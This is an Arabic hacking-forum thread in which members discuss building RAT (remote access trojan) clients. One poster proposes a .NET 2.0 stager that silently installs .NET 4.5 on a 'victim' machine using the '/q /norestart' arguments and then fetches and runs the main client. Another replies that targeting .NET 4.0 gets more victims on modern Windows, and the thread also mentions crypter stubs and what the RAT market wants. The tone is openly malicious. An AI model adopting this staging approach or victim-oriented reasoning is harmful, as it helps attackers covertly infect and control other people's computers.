فكرة ثانية لو الكلاينت كان مثلا 2.0 "اعرف حسب كتابتك رح يحتاج 4.0 ..ولكن خلنا نسوي كلاينت اولي يستخدم 2.0 فقط لو المستخدم يعرف انه "الض حية" ماعنده 4.5 او شاكك انه ماعنده
الكلاينت الاولي بيتسقبل امر واحد فقط وهو تحميل الفريم ورك 4.5 وتثبيته بشكل مخفي فقط بالروسس ستارت مرر الارجومنت التالية ومن ثم جلب وتشغيل الكلاينت الاصلي بعدها اللي بده 4.5
C#:
"dotnetfx45.exe" // مسار الفريم وورك اللي تم تحميله من قبل الكلاينت الاولي
" /q /norestart" // الارجومنت للتنفيذ بخفاء
طبعا هالشي يكون اختياري من المستخدم لو حب يستخرج الكلاينت الاولي 2.0 الي شغلته وعملته بس يحمل الفريم وورك ويثبته بخفاء ويشغل الكلاينت الاصلي بعدها اللي بده 4.5

اغلب اللي يبتعدو عن الراتات اللي بدها 4.0+ هو بسبب انه بدهم الكلاينت يكون 2.0 لخوفهم من عندم تواجد فريم ورك اعلى عند الض حية ..هيك انت بتكون كسبت الكل خخخ

يعطيك العافيه انا فاهم قصدك ولكن

الفريم وورك 4.0 يأتي مع تحديثات ويندوز 7

وعلاوة على ذلك أن أغلب المستخدمين الآن يستخدمون ويندوز 10 أو 8.1 .. انتهى عصر الفيستا ونهايه ويندوز 7 قريبه أيضاً.

الاعضاء تعودوا على نمط 2.0 لأنهم لايزالون يستخدمون نجرات .. وهذا كل مافي الأمر. بمعنى أخرى .. الأعضاء لايزالون يعيشون في موسم 2013\2014

أصلا حـــالياً من يعتمد على فريم وورك 2.0 يحصل ضحايا اقل لأن ويندوز 8 و 8.1 و 10 لا يدعمونه بشكل افتراضي!

على عكس 4.0 المتوفر على كل انظمة ويندوز + ويندوز 7 اذا كان مفعل خاصية التحديثات Windows Update.

ولا ننسى أنك تستطيع تنفيذ ملفات 2.0 في الذاكرة لو كان الكلاينت 4.0 ولكن لو كان الكلاينت 2.0 فلن تستطيع تنفيذ أي ملف 4.0 !!

آن الاوان لنسيان شيء اسمه ويندوز فيستا + 7 و فريم وورك 2.0

و من باب الصدفه .. اليوم تحديداً قال أحد مبرمجين برامج التشفير القديمة في الساحه "أن ابتداءاً من اليوم سوف ستم تغيير الستب من 3.5 إلى 4.0" << صح النوم أهلاً بك في 2019! هههه

في الأخير طريقتك ممتازة جداً ولكن الأفضل أن يكون الكلاينت ثابت الفريم.
 

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,568
2,964
1
يعطيك العافيه انا فاهم قصدك ولكن

الفريم وورك 4.0 يأتي مع تحديثات ويندوز 7

وعلاوة على ذلك أن أغلب المستخدمين الآن يستخدمون ويندوز 10 أو 8.1 .. انتهى عصر الفيستا ونهايه ويندوز 7 قريبه أيضاً.

الاعضاء تعودوا على نمط 2.0 لأنهم لايزالون يستخدمون نجرات .. وهذا كل مافي الأمر. بمعنى أخرى .. الأعضاء لايزالون يعيشون في موسم 2013\2014

أصلا حـــالياً من يعتمد على فريم وورك 2.0 يحصل ضحايا اقل لأن ويندوز 8 و 8.1 و 10 لا يدعمونه بشكل افتراضي!

على عكس 4.0 المتوفر على كل انظمة ويندوز + ويندوز 7 اذا كان مفعل خاصية التحديثات Windows Update.

ولا ننسى أنك تستطيع تنفيذ ملفات 2.0 في الذاكرة لو كان الكلاينت 4.0 ولكن لو كان الكلاينت 2.0 فلن تستطيع تنفيذ أي ملف 4.0 !!

آن الاوان لنسيان شيء اسمه ويندوز فيستا + 7 و فريم وورك 2.0

و من باب الصدفه .. اليوم تحديداً قال أحد مبرمجين برامج التشفير القديمة في الساحه "أن ابتداءاً من اليوم سوف ستم تغيير الستب من 3.5 إلى 4.0" << صح النوم أهلاً بك في 2019! هههه

في الأخير طريقتك ممتازة جداً ولكن الأفضل أن يكون الكلاينت ثابت الفريم.
كلام منطقي و"اعرفه" اخي نيان .. بس لو تجي للسوق هذا المطلوب
كلامي كان واضح فقط فيما يخص السوق والطلب .
 
  • أعجبني
التفاعلات: NYAN CAT

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك